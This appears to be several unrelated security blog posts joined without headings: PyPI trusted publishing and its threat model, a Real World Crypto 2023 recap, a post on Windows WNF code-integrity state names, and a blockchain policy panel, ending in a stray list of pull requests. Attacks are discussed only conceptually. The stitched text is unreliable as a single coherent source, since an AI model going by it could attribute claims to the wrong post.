- Pre-compromise security. Trusted publishing reduces the number of adversaries: an attacker with access to only some GitHub Actions environments or particular (non-permission) steps can’t mint the OIDC credential needed to use the trusted publisher. This is in marked contrast to a long-lived token stored in a GitHub Actions secret, where any step (and frequently any environment) can access the credential!
- Post-compromise recovery. Trusted publishing is fundamentally ephemeral: the credentials involved (both the OIDC and PyPI credentials) live for only a few minutes at a time, meaning that an attacker who loses access during post-compromise response is automatically sealed off without any human intervention. That means fewer manual steps and fewer possible human errors. 
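For intuition about what the index side does with a presented token, here is a small, purely illustrative Python sketch of the kind of claim matching a relying party could perform once the token's signature has been verified. The claim names mirror GitHub's OIDC tokens, but the TRUSTED_PUBLISHERS structure and the function are hypothetical and are not PyPI's actual implementation.

# Hypothetical registry of trusted publishers, as configured by project owners.
TRUSTED_PUBLISHERS = {
    "sampleproject": [
        {
            "repository": "hamilcar/cartago",  # user/repo slug
            "workflow": "release.yml",         # workflow filename doing the publish
            "environment": "release",          # optional GitHub Actions environment
        },
    ],
}

def projects_for_claims(claims: dict) -> list[str]:
    """Return the projects that trust an already signature-verified claim set."""
    matched = []
    for project, publishers in TRUSTED_PUBLISHERS.items():
        for pub in publishers:
            if (
                claims.get("repository") == pub["repository"]
                # job_workflow_ref looks like "owner/repo/.github/workflows/release.yml@refs/...",
                # so matching on the filename portion is a simplification here.
                and pub["workflow"] in claims.get("job_workflow_ref", "")
                and (not pub.get("environment") or claims.get("environment") == pub["environment"])
            ):
                # A robust implementation would also pin stable numeric IDs (e.g., GitHub's
                # repository_owner_id claim) to resist the account resurrection attack discussed below.
                matched.append(project)
    return matched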
Security and threat model considerations

Trusted publishing is another way to securely authenticate to a package index. Like every security feature, it must be designed and implemented against a threat model. That threat model must justify trusted publishing’s existence, both in terms of the attackers that previous authentication methods do not address and in terms of the new attack scenarios it exposes.

Existing threats: account takeover and supply chain attacks

Account takeover (ATO) is a known problem in packaging ecosystems: an attacker who manages to compromise a legitimate user’s PyPI or GitHub account can upload malicious releases (or even override previous ones) without any outward indication of inauthenticity. In the general case, ATO is an unsolvable problem: services like PyPI and GitHub can improve access to security features (and even mandate those features) but fundamentally cannot prevent a user from disclosing their credentials (e.g., via phishing), much less protect them from every piece of potentially vulnerable software they use. At the same time, features like trusted publishing can reduce the scope of account takeover: a future in which package indices allow packages to opt in to only trusted publishing is one where an ATO on the package index itself doesn’t allow the attacker to upload malicious releases. Similarly, “supply chain security” is all the rage these days: companies and hobbyists alike are taking a second look at out-of-control dependency trees and their frequently unaccountable and untraceable components. Without trusted publishing, the status quo for GitHub Actions is that you trust every third-party action you execute: they can all read your configured secrets. This is extremely non-ideal and is one of the key attack models trusted publishing intends to secure against.

New threats: “account resurrection” and malicious committers

Trusted publishing works because it’s tied to a notion of “trusted identity”: the trusted identity on the other side (e.g., on GitHub Actions) is a tuple of user/repo, workflow name, and an optional environment name. But wait: what happens if a user changes their username and an attacker takes over their old username? We call this “account resurrection,” and it’s explicitly supported by most services: a username isn’t intended to be a permanent, stable identifier for the underlying identity. This opens up an entirely new attack vector: a PyPI project that trusts hamilcar/cartago might suddenly begin trusting an attacker-controlled hamilcar/cartago, all because the original hamilcar is now hannibal (and the legitimate hamilcar/cartago is now hannibal/cartago). We thought of this while designing trusted publishing for PyPI and worked with GitHub to add an additional claim that binds the OIDC token not just to the username, but also to the account’s unique, stable user ID. This gives us the state we need to prevent resurrection attacks: even if an attacker manages to become hamilcar on GitHub, their underlying user ID will not change and PyPI will reject any identity tokens they present. Trusted publishing also reveals a new (potential) division in a project’s trust model: for any given project, do you trust every member of that project to also be a potential publisher? In many cases, the answer is yes: many projects have only one or two repository members, both of whom are also owners or otherwise privileged on the package index. 
In some cases, however, the answer is no: many projects have dozens of low-activity or inactive members, not all of whom may be following best practices for securing their accounts. These members might not be removable because of community policy or because they need access for infrequent (but critical) project activities. These users should not necessarily receive the ability to publish releases to the packaging index just because they have the commit bit on the repository. This is also a consideration we made while designing trusted publishing, and it’s why PyPI’s implementation supports an optional GitHub Actions environment: for communities where users who commit and users who publish do not wholly overlap, an environment can be used to impose additional workflow restrictions that are reflected (and subsequently honored by PyPI) in the OIDC token. A detailed example of this is given in PyPI’s own security model documentation.

Coming to a package index near you

Our work on PyPI was funded by the incredible Google Open Source Security Team (GOSST), whom we’ve also worked with to develop new tooling for the Python ecosystem’s overall security. In particular, we’d like to thank Dustin Ingram for tirelessly working alongside us and directing the overall pace and design of trusted publishing for PyPI. At the moment, PyPI is the only package index offering trusted publishing that we’re aware of. That being said, nothing about trusted publishing is unique to Python or Python packaging: it could just as easily be adopted by Rust’s Crates, Ruby’s RubyGems, JavaScript’s NPM, or any other ecosystem where publishing from a third-party service is common (like GitHub Actions or GitLab’s CI/CD). It’s our opinion that, much like Two-Factor Authentication in 2019, this kind of trusted publishing scheme will become instrumental to the security model of open-source packaging. We see it as a building block for all kinds of subsequent improvements, including being able to generate strong cryptographic proof that a PyPI release was built from a particular source artifact. If you or your company are interested in this work, please get in touch with us! We have years of experience working on security features in open-source ecosystems and are always looking for more ways to contribute to critical open-source projects and services.

Last month, hundreds of cryptographers descended upon Tokyo for the first Real World Crypto Conference in Asia. As in previous years, we dispatched a handful of our researchers and engineers to present and attend the conference. What sets RWC apart from other conferences is that it strongly emphasizes research, collaborations, and advancements in cryptography that affect real-world systems. This year, we noticed a couple of items that we’ll highlight. First, many talks detailed the painstaking process that is secure cryptographic protocol development. Second, PQC is on the rise and is steadily advancing from theory into practice. Lastly, sometimes the most interesting cryptographic flaws aren’t even cryptographic flaws: bad RNGs and multi-threading can just as easily break your cryptography.

Our EDHOC presentation

Marc presented his research (paper, video, slides) analyzing the security of the Ephemeral Diffie-Hellman Over COSE (EDHOC) protocol. EDHOC is a lightweight key exchange protocol similar to TLS but more compact. 
In collaboration with other researchers, Marc’s work verified multiple security properties of the EDHOC protocol and even identified theoretical security issues that led to updates made to the EDHOC standard. The talk highlighted how the LAKE working group openly called on the community to analyze EDHOC and benefited from many insights, making the protocol safer and better overall. With high-assurance cryptography on the rise, more tools are available to assist with this task. For instance, one of the presented projects (paper, slides, video) paves the way for high-assurance standards for cryptography: it provides tools for writing cryptographic specifications that can then be formally verified.

Invite your friends and adversaries to your protocol party!

Our talk echoed a common theme at the conference, encouraging people to collaborate with researchers and stakeholders to analyze crypto and protocols instead of rolling their own. Many cryptographic protocols, such as End-to-End-Encryption (E2EE) messengers, have been broken in recent years with varying levels of impact. Notable examples include Telegram in 2022, Bridgefy, and Threema (paper, slides, video). These examples have something in common: missing formal analysis. The lesson is that Telegram, Bridgefy, and Threema should not have rolled their own crypto! But to be fair, deployment of a new and ad-hoc protocol is hardly uncommon. The first formal analysis of the highly acclaimed Signal protocol came after the Signal app was already deployed. Even then, further analysis was needed to capture other security aspects. On its own, the phrase “Don’t roll your own crypto” isn’t helpful. Someone has to roll some crypto at some point. The case of Threema shows that an application that uses all the right cryptographic primitives can still be broken. One lesson from the E2EE messaging world is that, perhaps, it doesn’t matter who rolled what. What’s important is the analysis that was performed against the protocol. Formal analysis and good old cryptanalysis of a protocol are necessary to gain confidence in a new protocol. Don’t roll your protocol alone! Use all the tools available to you. If you are unfamiliar with one of these tools, use the army of friends willing to apply these tools against your protocol. If you’d like to learn more about how to analyze these protocols and the tools available, book a call to discuss with one of our cryptographers. Our doors are always open!

Post-quantum cryptography is steadily advancing

NIST announced the post-quantum cryptography (PQC) standard candidates last year, so it did not come as a huge surprise that PQC was a big topic of discussion at RWC. In addition to the RWC conference this year, an additional Real World PQC workshop was run alongside RWC to cover additional topics. PQC is steadily advancing, with standards for the first primitives expected to emerge over the coming years. However, as this year’s talks indicate, many challenges lie ahead for the post-quantum world. First, implementing these schemes in real systems is challenging, with many unknown and unforeseen issues. In addition to this, more PQC primitives and protocols are needed. Designing more advanced primitives securely and effectively across many use cases will be challenging. Here are some interesting discussions of these challenges.

Industry applications

A talk from Google described applying PQC to their Application Layer Transport Security (ALTS) protocol. 
ALTS is an authentication protocol, similar to TLS, that Google uses to secure communication within its infrastructure, such as data centers. Threat modeling shows that this is where PQC is most urgently needed, so Google decided to implement NTRU-HRSS, a lattice-based post-quantum cryptosystem, for ALTS even before the NIST standardization process was complete. This talk presented some implementation issues that occurred; for instance, the public key and ciphertext for this cryptosystem were 9-10 times larger than those of the existing ALTS algorithms, allocating large HRSS keys on the stack resulted in stack overflows for some architectures, and performance in practice didn’t align with the expected benchmarks. However, with some adjustments, they managed to integrate NTRU-HRSS into ALTS within their requirements.

Cloudflare also presented a talk describing an internal PQC project. Cloudflare supports Privacy Pass, a cryptographic protocol that allows users to prove they are humans and not bots across many websites without revealing unnecessary private information about themselves. To achieve this, Privacy Pass uses advanced cryptographic primitives known as blind signatures and anonymous credentials. Unfortunately, the NIST standardization process does not have any candidates for advanced primitives such as these, so Cloudflare designed its own post-quantum scheme based on Dilithium, a digital signature candidate selected by NIST. The result was surprisingly efficient: ~300ms prover time and ~20ms verifier time, with a proof size of ~100KB. It’s exciting to see post-quantum cryptography applied to more advanced cryptographic primitives and protocols such as Privacy Pass.

NXP presented work that implemented the Dilithium PQC candidate on an embedded device. For embedded devices, protecting against side-channel attacks becomes vitally important. This talk identified a gap in the research around Dilithium: compared with another candidate, Kyber, protecting against side channels in Dilithium has received little attention. NXP’s work identified some improvements to state-of-the-art mitigations. Their work also noted that much of the runtime was spent protecting the implementation by invoking the Keccak hash function, and on their embedded devices, a significant speedup could be obtained if these calls were replaced with calls to a True Random Number Generator (TRNG). However, using a TRNG instead of Keccak would violate the specification, which is a great example of why these standardization processes are difficult and time-consuming. Designing a system that will run securely and optimally across many different platforms and use cases is difficult.

PQC in other talks

While the NIST PQC standardization effort focuses on cryptographic primitives, these primitives will eventually have to be used in protocols. Updating existing protocols to include post-quantum-resilient primitives is nontrivial, as explained in the context of the IETF at RWPQC (slides). Since the post-quantum candidates are relatively young by cryptographic standards, not everyone fully trusts their resistance against attacks. More than one candidate has been broken by the dreaded laptop running over a weekend. Therefore, they are preferably deployed in a hybrid approach, alongside their classical counterparts, to ensure the best of both worlds regarding security. (You would need to break both primitives to attack the protocol.) 
Several protocol updates using this approach were presented at RWPQC and RWC, starting with a post-quantum variant of the Noise protocol framework (video, slides) for constructing key exchange protocols. Furthermore, lightning talks at RWC and RWPQC introduced Rosenpass, a post-quantum variant of the WireGuard protocol for constructing VPNs.

Cryptographic failures are often non-cryptographic

Previous years of Real World Crypto featured non-cryptographic errors breaking prominent cryptographic schemes. This year was no exception: multiple talks demonstrated fatal non-cryptographic attacks on cryptographic hardware, protocols, and schemes. Cryptography is a powerful tool for solving many problems in software; many years of research and cryptanalysis have given us a powerful suite of primitives that can, for example, safely encrypt and protect our data. But software is still only as strong as its weakest link, and a secure encryption scheme is useless when an attacker can easily bypass it entirely, as we will see in some of the talks from this year.

Wi-Fi Fails

In his talk (paper, slides, video), Mathy Vanhoef presented two new variants on a well-known class of weaknesses in the 802.11 standards, which include WPA2 and WPA3. The first variant completely bypasses Wi-Fi encryption by tricking an access point (AP) into insecurely “encrypting” buffered packets with an all-zero key or otherwise undefined key context. So, rather than developing some complex and novel cryptographic attack against the encryption scheme, this bug tricks an AP into using an empty encryption key. The second variant involves bypassing client isolation, a common feature of wireless networks intended for use by untrusted clients (e.g., public hotspots and global networks like eduroam). APs that offer client isolation rely on ad-hoc synchronization between two nominally decoupled layers of the 802.11 stack: the security layer, which uses 802.1X identities, and the packet routing layer, which uses IP addresses and device MACs. By abusing this dependency between decoupled layers, an attacker can insert a request with a spoofed MAC and, when timed correctly, trick the AP into encrypting the incoming response with a newly generated key. The result is that the attacker can not only spoof the victim’s MAC (ordinarily just a denial of service) but also decrypt incoming traffic intended for the victim. This attack does not rely on any sort of novel cryptographic attack. It’s easy to trick the AP into decrypting things for you instead! These two new variants are not particularly similar in procedure or scenario but are similar in origin: ambiguity within the specification with respect to extended functionality (client isolation) or optimizations (packet buffering) regularly offered by vendors. Together, these cleanly represent one of the biggest challenges to the value of formal modeling: the model under proof must be correct and complete with respect to actual device behavior. As we know from the world of compiler optimizations, observably equivalent behavior is not necessarily safe for all observers; the same basic truth applies to protocol design!

Weak RNGs and weak testing are a toxic combination

In their talk (slides, video), Benadjila and Ebalard stepped through their investigation of many duplicated ECDSA keys and nonces observed while testing a large X.509 certificate corpus. 
When evaluating ~313,000 self-signed ECDSA certificates originating from Cisco ASA boxes, 26% (~82,000) had duplicated ECDSA nonces, and 36% (~113,000) had duplicated ECDSA keys. Additionally, of approximately 200,000 self-signed RSA certificates, 6% (~12,000) had duplicated RSA moduli. RNG failures from poor RNG selection or poor entropy sourcing have a long and storied history across hardware and software vendors, including Cisco’s ASAs (RWC 2019). The presenters immediately narrowed in on 2019’s disclosure as a likely source, indicating that the previous disclosure and fix were insufficient and potentially deployed without meaningful testing. Correct construction and use of cryptographically secure pseudo-random number generators (CSPRNGs) are subtle and difficult, with catastrophic failure modes. At the same time, CSPRNG construction and use are well-trodden problems: the sharp edges in the NIST SP-800 90A DRBGs are well understood and documented, and strong seeding has always been a requirement regardless of underlying CSPRNG construction. Much like the talk about bypassing Wi-Fi encryption, the failures here are fundamentally at the design and software development lifecycle layers rather than low-level cryptographic flaws. The takeaway is to maintain a strong test suite covering both the happy and sad code paths and incorporate the best practices regarding the software development lifecycle to prevent reintroducing old bugs or code issues. It takes a village Real World Crypto 2023 taught us that old and new cryptographic techniques and protocols benefit most when a diverse set of researchers and analyses are involved. Even after passing several rounds of scrutiny, implementations should be monitored regularly. Whether transferring data, setting up RNGs, or applying PQC, misinterpretations and errors can compromise data integrity and privacy. We are grateful to all the researchers that presented at this year’s RWC conference, who have dedicated so much effort toward securing the world we live in, and we are proud to be active members of this community. By Yarden Shafir, Senior Security Engineer WNF (Windows Notification Facility) is an undocumented notification mechanism that allows communication inside processes, between processes, or between user mode processes and kernel drivers. Similar to other notification mechanisms like ETW (Event Tracing for Windows) and ALPC (Advanced Local Procedure Call), WNF communication happens over different “channels,” each representing a unique provider or class of information. Offensive engineers already found several uses for WNF. Alex Ionescu and Gabrielle Viala reported information leaks and denial-of-service bugs that were fixed by Microsoft; @modexpblog demonstrated code injection through WNF names, which is undetected by pretty much all EDR products; and Alex Plaskett of NCC Group demonstrated how attackers could use WNF allocations to spray the kernel pool. WNF is used extensively by Windows components to send or receive information about software and hardware states. It can be used in the same way by 3rd party applications to learn about the state of the system, send messages to Windows processes or drivers or as an internal communication channel between processes or drivers (though WNF is undocumented and therefore not meant to be used by 3rd parties at all). Reading and interpreting WNF state names In the WNF world, these previously mentioned “channels” are called state names. 
WNF state names are 64-bit numbers that are composed of:

- Version
- Lifetime:
  - Well-known, predefined in the system
  - Permanent, persist in the registry across boot sessions
  - Persistent, persist in memory, but not across boot sessions
  - Temporary, only exist in the context of the process and are gone when the process terminates
- Scope: System, Session, User, Process, or Physical Machine
- Permanent data bit
- Unique sequence number

These attributes are combined into the state name using this bit layout:

typedef struct _WNF_STATE_NAME_INTERNAL
{
    ULONG64 Version : 4;
    ULONG64 NameLifetime : 2;
    ULONG64 DataScope : 4;
    ULONG64 PermanentData : 1;
    ULONG64 Unique : 53;
} WNF_STATE_NAME_INTERNAL, *PWNF_STATE_NAME_INTERNAL;

Until recently, this mechanism was almost exclusively meant for hardware components such as the battery, microphone, camera, and Bluetooth, and held very little interest for defensive engineers. But that is beginning to change with the recent addition of several new state names used by the kernel code integrity manager, which now uses WNF to notify the system about interesting code integrity events that might be useful to security tools. While still undocumented and unrecommended for general use, it may be time for defenders to start looking further into WNF and its potential benefits. Starting from Windows 10, WNF now offers several added well-known state names that get notified by the kernel Code Integrity Manager (CI.dll). This component is responsible for all kernel hashing, signature checks, and code integrity policies, which is rich information for all security products.

How do we find out about those names? Well, to dump all well-known state names on the machine, you’d have to install the Microsoft SDK, then run WnfNameDumper to retrieve all WNF names defined in perf_nt_c.dll and dump their human-friendly names, IDs, and descriptions into a file, which would look like this:

{"WNF_CELL_UTK_PROACTIVE_CMD", 0xd8a0b2ea3bcf075},
    // UICC toolkit proactive command notification for all slots. SDDL comes from ID_CAP_CELL_WNF_PII
    // and UtkService in %SDXROOT%\src\net\Cellcore\packages\Cellcore\Cellcore.pkg.xml
{"WNF_CELL_UTK_SETUP_MENU_SLOT0", 0xd8a0b2ea3bce875},
    // UICC toolkit setup menu notification for slot 0. SDDL comes from ID_CAP_CELL_WNF_PII
    // and UtkService in %SDXROOT%\src\net\Cellcore\packages\Cellcore\Cellcore.pkg.xml
{"WNF_CELL_UTK_SETUP_MENU_SLOT1", 0xd8a0b2ea3bdd075},
    // UICC toolkit setup menu notification for slot 1. SDDL comes from ID_CAP_CELL_WNF_PII
    // and UtkService in %SDXROOT%\src\net\Cellcore\packages\Cellcore\Cellcore.pkg.xml
etc., etc., etc…

In Windows version 22H2, the Windows SDK contains just over 1,400 well-known state names. Many of those names can be revealing, but for now, we’ll focus on the WNF_CI (code integrity) names:

{"WNF_CI_APPLOCKERFLTR_START_REQUESTED", 0x41c6072ea3bc2875}, // This event signals that AppLockerFltr service should start.
{"WNF_CI_BLOCKED_DRIVER", 0x41c6072ea3bc1875}, // This event signals that an image has been blocked from loading by PNP
{"WNF_CI_CODEINTEGRITY_MODE_CHANGE", 0x41c6072ea3bc2075}, // This event signals that change of CodeIntegrity enforcement mode has occurred.
{"WNF_CI_HVCI_IMAGE_INCOMPATIBLE", 0x41c6072ea3bc1075}, // This event signals that an image has been blocked from loading as it is incompatible with HVCI.
{"WNF_CI_SMODE_CHANGE", 0x41c6072ea3bc0875}, // This event signals that change of S mode has occurred. 
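As an illustration of that bit layout, here is a small, hedged Python sketch that splits a state name into its fields. Public write-ups of WNF commonly note that the published state name constants are XORed with a fixed key (0x41C64E6DA3BC0074) before the fields become meaningful; that key and this decoding are assumptions based on that research, not on official documentation.

# Toy decoder for WNF state names, following the WNF_STATE_NAME_INTERNAL bit layout above.
WNF_STATE_KEY = 0x41C64E6DA3BC0074  # XOR key reported in public WNF research (assumption)

LIFETIMES = ["Well-known", "Permanent", "Persistent", "Temporary"]
SCOPES = ["System", "Session", "User", "Process", "Physical Machine"]

def decode_state_name(state_name: int) -> dict:
    n = state_name ^ WNF_STATE_KEY
    lifetime = (n >> 4) & 0x3
    scope = (n >> 6) & 0xF
    return {
        "version": n & 0xF,
        "lifetime": LIFETIMES[lifetime],
        "scope": SCOPES[scope] if scope < len(SCOPES) else scope,
        "permanent_data": bool((n >> 10) & 0x1),
        "unique": n >> 11,
    }

# Example: one of the code integrity names discussed below.
print(decode_state_name(0x41C6072EA3BC0875))  # WNF_CI_SMODE_CHANGE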
In this version we can see five state names with the prefix WNF_CI, all generated by the Code Integrity manager, and each one has a helpful description telling us what it’s used for. And unlike most other WNF names, here we see a few events that could be helpful to defensive engineers:

- WNF_CI_APPLOCKERFLTR_START_REQUESTED – Signals that AppLockerFltr service should start
- WNF_CI_BLOCKED_DRIVER – Signals that a driver has been blocked from loading by HVCI (Hypervisor-protected Code Integrity) because it was found in the block list
- WNF_CI_CODEINTEGRITY_MODE_CHANGE – Signals that a change of CodeIntegrity enforcement mode has occurred
- WNF_CI_HVCI_IMAGE_INCOMPATIBLE – Signals that an image has been blocked from loading as it is incompatible with HVCI, most likely because it has regions that are both writable and executable or allocates memory from the executable non-paged pool
- WNF_CI_SMODE_CHANGE – Signals that a change of S mode has occurred

Usually, the buffers passed into WNF state names are a mystery, and their contents must be reverse-engineered. But in this case, Microsoft exposes the data passed into one of the state names in the public Microsoft Symbol Server, accessed through symchk.exe and symsrv.dll:

typedef struct _WNF_CI_BLOCKED_DRIVER_CONTEXT
{
    /* 0x0000 */ struct _GUID Guid;
    /* 0x0010 */ unsigned long Policy;
    /* 0x0014 */ unsigned short ImagePathLength;
    /* 0x0016 */ wchar_t ImagePath[1];
} WNF_CI_BLOCKED_DRIVER_CONTEXT, *PWNF_CI_BLOCKED_DRIVER_CONTEXT;

We can get some information from the Code Integrity manager, which could be useful for EDR products. Some of this can also be found in the Microsoft-Windows-CodeIntegrity ETW (Event Tracing for Windows) channel, as well as other interesting events (which deserve a post of their own). Still, some of the data in these WNF names can’t be found in any other data source. Now if we update our SDK version to the preview build (25336 during the writing of this post), we can see a few other WNF state names that haven’t been released to the regular builds yet:

{"WNF_CI_APPLOCKERFLTR_START_REQUESTED", 0x41c6072ea3bc2875}, // This event signals that AppLockerFltr service should start.
{"WNF_CI_BLOCKED_DRIVER", 0x41c6072ea3bc1875}, // This event signals that an image has been blocked from loading by PNP
{"WNF_CI_CODEINTEGRITY_MODE_CHANGE", 0x41c6072ea3bc2075}, // This event signals that change of CodeIntegrity enforcement mode has occurred.
{"WNF_CI_HVCI_IMAGE_INCOMPATIBLE", 0x41c6072ea3bc1075}, // This event signals that an image has been blocked from loading as it is incompatible with HVCI.
{"WNF_CI_LSAPPL_DLL_LOAD_FAILURE", 0x41c6072ea3bc3075}, // This event signals that a dll has been blocked from loading as it is incompatible with LSA running as a protected process.
{"WNF_CI_LSAPPL_DLL_LOAD_FAILURE_AUDIT_MODE", 0x41c6072ea3bc3875}, // This event signals that an unsigned dll load was noticed during LSA PPL audit mode.
{"WNF_CI_SMODE_CHANGE", 0x41c6072ea3bc0875}, // This event signals that change of S mode has occurred.

Here, we see two new state names that add information about PPL-incompatible DLLs being loaded into the Local Security Authority Subsystem Service (LSASS). LSASS, the OS authentication manager, runs as a PPL (Protected Process Light). This ensures that the process isn’t tampered with and is only running code signed with the correct signature level.

Investigating LSASS protections with WNF

Microsoft has been trying to make LSASS run as a PPL for a while now. 
Still, it couldn’t fully enable it because of compatibility issues with products that require full access to LSASS, including the injection of different plugins. However, they’re attempting to still protect LSASS as much as possible from credential stealers like Mimikatz, while still allowing users the option to turn LSASS back into a regular process. Since Windows 8.1, there has been an option to run LSASS as a PPL in audit mode. This means the system still treats it as a normal process but logs any operation that would have been blocked if it ran as a PPL. In Windows 11 it runs as a regular PPL by default, with an option to run it in audit mode exposed through the registry and the security center (in Preview builds).

So this is where our two new state names come in: WNF_CI_LSAPPL_DLL_LOAD_FAILURE gets notified when LSASS is running as a regular PPL and a DLL that isn’t signed according to the PPL requirements is blocked from loading into the process. And WNF_CI_LSAPPL_DLL_LOAD_FAILURE_AUDIT_MODE gets notified when LSASS is running as a PPL in audit mode and loads a DLL that would have been blocked if it were running as a normal PPL.

Endpoint Detection & Response (EDR) tools can be alerted about all DLL loads through a documented kernel callback. The image load notify routine does include cached signing information inside IMAGE_INFO in the fields ImageSignatureLevel and ImageSignatureType; however, this information may not always be available, and the callback isn’t notified about blocked DLL loads. Blocked DLL loads are interesting as they indicate what could be an exploitation attempt (or an organization trying to load their plugin written in 2003 into LSASS). So, while none of these new state names contain any information that is exceptionally interesting to EDRs, they do have some interesting data that security products could find useful and, at a minimum, add some visibility or save the EDR some work.

And, of course, there is already one user for some of these WNF_CI state names: the Windows Defender command-line tool MpCmdRun.exe. MpSvc.dll, one of the DLLs loaded into MpCmdRun.exe, subscribes to two WNF state names: WNF_CI_CODEINTEGRITY_MODE_CHANGE and WNF_CI_SMODE_CHANGE. Whenever they are notified, the DLL queries them to get the new values and updates its internal configuration accordingly. Other pieces of the system subscribe to these state names too. I used WinDbg commands to extract this list from my own system:

- The DcomLaunch service registers for WNF_CI_SMODE_CHANGE, WNF_CI_BLOCKED_DRIVER and WNF_CI_APPLOCKERFLTR_START_REQUESTED
- The Utcsvc service (through utcsvc.dll) registers for WNF_CI_SMODE_CHANGE
- SecurityHealthService.exe registers for WNF_CI_SMODE_CHANGE
- Msteams.exe registers for WNF_CI_SMODE_CHANGE
- The PcaSvc service (through PcaSvc.dll) registers for WNF_CI_HVCI_IMAGE_INCOMPATIBLE and WNF_CI_BLOCKED_DRIVER – this is the service responsible for displaying the pop-up message when your favorite vulnerable driver won’t load on your HVCI-enabled system.

Currently, no process subscribes to the new LSA (Local Security Authority) state names (WNF_CI_LSAPPL_DLL_LOAD_FAILURE and WNF_CI_LSAPPL_DLL_LOAD_FAILURE_AUDIT_MODE), but since those are still in the preview stage that isn’t very surprising, and I’m sure we’ll be seeing some subscriptions to them in the future.

Explore the possibilities with new WNF info

Windows has empowered security enthusiasts on both the offensive and defensive sides with newly attainable information in WNF. 
By expanding beyond the historical scope and adding state names to WNF, researchers have a more transparent view of how things operate. Over time, it’s likely you’ll see security researchers correlate this information with other events and processes to showcase novel security research! Here, we’ve provided a quick introduction to WNF and its new features along with a simple example of how it can be used to investigate LSASS. If you’re interested in more details on WNF internals and its offensive capabilities, Alex Ionescu and Gabrielle Viala presented it in detail in a BlackHat 2018 talk. They later published a blog post and a collection of useful scripts. Last September, Principal Security Engineer Dr. Evan Sultanik was on a panel hosted by the Naval Postgraduate School’s Distributed Consensus: Blockchain & Beyond (DC:BB) movement, where faculty and students there are seeking opportunities to learn and share knowledge, research, funding, and events focused on distributed consensus technologies. The panel of nine government, academia, and industry experts discussed how blockchains, digital assets, and other Web3 technologies intersect with national security challenges. Dr. Sultanik discussed how the U.S. could help push global adoption and take a broader strategic outlook toward blockchain and Web3 technologies. He talked about the inherent limitations of blockchain technologies and the Web3 movement and also offered suggestions from a training perspective that could lead to a more robust ecosystem. We’ve summarized the most important parts of that discussion here. What are the some important things to consider when using blockchain technologies for a project? It’s fundamental to better understand the tradeoffs one must make when using a blockchain and its security implications. Everyone at this point is aware that using a blockchain has significant additional overhead in terms of deployment and the cost of interacting with smart contracts. The cost gradually decreases with the transitions to the new forms of consensus and higher-level protocols, but there’s still a significant difference. You have to realize that all data stored on a public blockchain is publicly available. Anyone can look through the entire history of each account or contract and understand the implications of those actions. You need to do something additional to ensure its privacy if that’s a requirement of your system. The majority of participants in a public blockchain are untrusted. You are shifting trust from what would otherwise be a central authority to other entities that you may or may not have control over. You’re not only trusting the developers of the smart contracts that your system is interacting with, but you’re also inherently trusting the developers of the technology stack running that particular blockchain. You’re trusting the node software, the mining hardware, the mining software, the mining pool protocol, and everything else down the line. A bug in any one piece of that stack can cause the whole thing to collapse. Blockchains allow developers to prototype new ideas quickly. You don’t have to worry about things like setting up infrastructure, and you don’t have to worry much about DevOps because that’s all handled by the blockchain itself. That allows you to significantly reduce the time between when an idea is created and when it is in the users’ hands. 
But that cycle also comes with risk because a tight development cycle can lead to poorly tested or designed protocols or sloppy development, leading to bugs with significant consequences, like being a big target for attackers. Another thing that makes DeFi, blockchain, and Web3 so appealing is that you can prototype quickly and instantly connect your application to the whole ecosystem. Since the blockchain acts as a huge shared database, contracts and assets created by competitors can be made to interact with each other in ways that would be disincentivized if implemented on a traditional centralized platform. This composition does come at a price. It’s difficult to reason about the system because you suddenly must understand all the different contracts that created these tokens. It’s different code in each case. And your code suddenly interacts with the whole universe of code on the blockchain. So, you must be mindful of all these other externalities and third-party components your app might interact with. We’ve seen this complexity play out recently with new types of financial instruments and technology that have become available, particularly on Ethereum, such as flash loans or maximum extractable value, which are really deep technical concepts. Still, millions of dollars have been lost because a bunch of different DeFi apps are composed in a single transaction in a way that none intended to be composed. Computer scientist Leslie Lamport wrote in 1987, “A distributed system is one in which the failure of a computer you didn’t even know existed can render your computer unusable.” This is still true today and will always be true in blockchains. Should the U.S. care about blockchain technologies, and if so, what’s the best application for the government? It’s a matter of national security that the U.S. government gets involved with blockchains: Other than perhaps lost tax revenue, Uncle Sam doesn’t really care if you lose your Bitcoin. But Uncle Sam should care if North Korea steals it. U.S. adversaries are already exploiting these technologies to circumvent sanctions and undermine our markets. It’s more productive to ask, “Can blockchain and Web3 technologies ever be made secure? If so, how?” The U.S. government needs to foster research and innovation to answer this question to stay relevant and remain a world leader in distributed ledger technology. How should the U.S. handle the training regimen needed in the Web3 space? There is a large need to change how we educate the incoming workforce because traditional software development expertise does not directly translate into Web3. I have friends who don’t have a background in computer science, yet they learned one programming language, wrote a mobile app, and are now millionaires. They don’t have any technical knowledge of what a phone is doing, how iOS or Android is running, or how the hardware works. They just needed to know that one programming language, and that was sufficient for them to build something very popular and effective. That isn’t true for Web3. Knowing the entire stack is helpful when creating smart contracts, because you need to understand the compiler that you’re using. You need to understand the virtual machine that’s running. You need to understand byzantine, fault-tolerant, and consensus protocols. You should understand zero-knowledge proofs or zk-SNARKs. You should understand all of these esoteric technologies, and very few experts know any of them, let alone all of them. 
You need to be an expert in them to avoid all the pitfalls and footguns. We need policies incentivizing people to enter the workforce with these necessary skills. At Trail of Bits, we’ve developed a blockchain security apprenticeship because finding people with all the necessary skills is difficult in this competitive market. Some security people know how to analyze a C++ program or a mobile app, but they have no idea about blockchain. And then you have blockchain people who have no background in security. So we developed this in-house program.

For mobile app stores, there has always been a low barrier to entry for people looking to get involved in the app economy. With Web3, that doesn’t seem to be the case, yet there is a lot of activity in this space. What more needs to be done to bring developers to a level where blockchain is mature from a security perspective, and what entities or organizations should lead that effort?

The barrier to entry is surprisingly low for Web3, too, which is part of the problem: Web3 development toolchains have been modeled after familiar toolchains from traditional app development. Developer friendliness has been prioritized at the expense of security. We need to modernize and improve the tooling to flip the balance of that prioritization.

Conclusion

It’s not enough for governments to only express interest in securing blockchain technologies. Real, purposeful investments need to be made. Beyond the design of secure architectures, languages, compilers, and protocols, these investments should also include educating a robust workforce to meet tomorrow’s Web3 demands. If you’re considering whether a blockchain might be the solution to a problem you’re trying to solve, we recommend our operational risk assessment titled “Do You Really Need a Blockchain?” This will give you a thorough look into the advantages and risks you may be taking. Finally, if you would like to hear more from the other experts on the panel about blockchain technologies and national security, you can view the discussion in its entirety at: https://nps.edu/web/nps-video-portal/-/blockchain-research-opportunities-for-nps-students-and-faculty.

The following are the pull requests and issues filed as part of this research:

- microsoft/binskim#777
- PowerShell/PowerShell-Native#88
- apple-open-source/macos#3: Though this is an unofficial fork, so I reported this further in Apple’s Feedback Assistant
